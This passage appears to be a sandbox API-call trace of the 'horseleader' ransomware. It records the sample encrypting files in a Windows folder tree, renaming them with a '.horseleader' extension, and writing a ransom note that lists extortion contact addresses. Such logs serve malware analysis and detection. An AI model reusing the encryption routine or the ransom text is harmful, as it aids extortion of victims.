returned 0x0 [0247.369] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.369] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.369] lstrlenW (lpString=".testttjffg") returned 11 [0247.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0247.372] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.372] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1379) returned 1 [0247.372] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x563, lpOverlapped=0x0) returned 1 [0247.375] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.375] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x563, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x563, lpOverlapped=0x0) returned 1 [0247.375] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.375] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.376] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.376] CloseHandle (hObject=0x1a4) returned 1 [0247.376] GetProcessHeap () returned 0x780000 [0247.376] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.376] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.horseleader") returned 89 [0247.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.horseleader")) returned 1 [0247.377] GetProcessHeap () returned 0x780000 [0247.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.377] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbbf3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.377] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.377] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0247.377] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.377] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.377] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.377] lstrlenW (lpString=".testttjffg") returned 11 [0247.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0247.378] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.378] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=48115) returned 1 [0247.378] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.380] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1bf3, lpOverlapped=0x0) returned 1 [0247.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe40d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1bf3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1bf3, lpOverlapped=0x0) returned 1 [0247.382] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.382] CloseHandle (hObject=0x1a4) returned 1 [0247.382] GetProcessHeap () returned 0x780000 [0247.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.382] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.horseleader") returned 90 [0247.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.horseleader")) returned 1 [0247.383] GetProcessHeap () returned 0x780000 [0247.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.383] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbbf3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.383] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.383] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\#Decrypt#.txt") returned 79 [0247.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.384] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.384] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.385] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.385] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.385] CloseHandle (hObject=0x158) returned 1 [0247.385] GetProcessHeap () returned 0x780000 [0247.385] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0247.385] lstrcmpiW (lpString1="NETWORK", lpString2="Windows") returned -1 [0247.385] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned 67 [0247.385] lstrcmpW (lpString1="NETWORK", lpString2=".") returned 1 [0247.385] lstrcmpW (lpString1="NETWORK", lpString2="..") returned 1 [0247.385] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.385] GetProcessHeap () returned 0x780000 [0247.385] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.385] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*") returned 69 [0247.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.386] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\.") returned 69 [0247.386] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.386] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.386] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\..") returned 70 [0247.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.386] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x107bd500, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x107bd500, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xc649, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="NETWORK.ELM", cAlternateFileName="")) returned 1 [0247.386] lstrcmpiW (lpString1="NETWORK.ELM", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0247.386] StrStrIW (lpFirst="NETWORK.ELM", lpSrch=".horseleader") returned 0x0 [0247.386] lstrcmpW (lpString1="NETWORK.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.386] lstrcmpW (lpString1="NETWORK.ELM", lpString2="_uninstalling_.png") returned 1 [0247.386] lstrlenW (lpString=".testttjffg") returned 11 [0247.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM", lpSrch=".testttjffg") returned 0x0 [0247.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.386] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0247.387] StrStrW (lpFirst="NETWORK.ELM", lpSrch=".txt") returned 0x0 [0247.387] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=50761) returned 1 [0247.387] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.389] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.390] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2649, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd9b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2649, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2649, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.391] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.391] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.391] CloseHandle (hObject=0x1a4) returned 1 [0247.391] GetProcessHeap () returned 0x780000 [0247.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.391] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM.horseleader") returned 91 [0247.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm.horseleader")) returned 1 [0247.392] GetProcessHeap () returned 0x780000 [0247.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.392] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="NETWORK.INF", cAlternateFileName="")) returned 1 [0247.392] lstrcmpiW (lpString1="NETWORK.INF", lpString2="Windows") returned -1 [0247.392] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0247.392] StrStrIW (lpFirst="NETWORK.INF", lpSrch=".horseleader") returned 0x0 [0247.392] lstrcmpW (lpString1="NETWORK.INF", lpString2="#Decrypt#.txt") returned 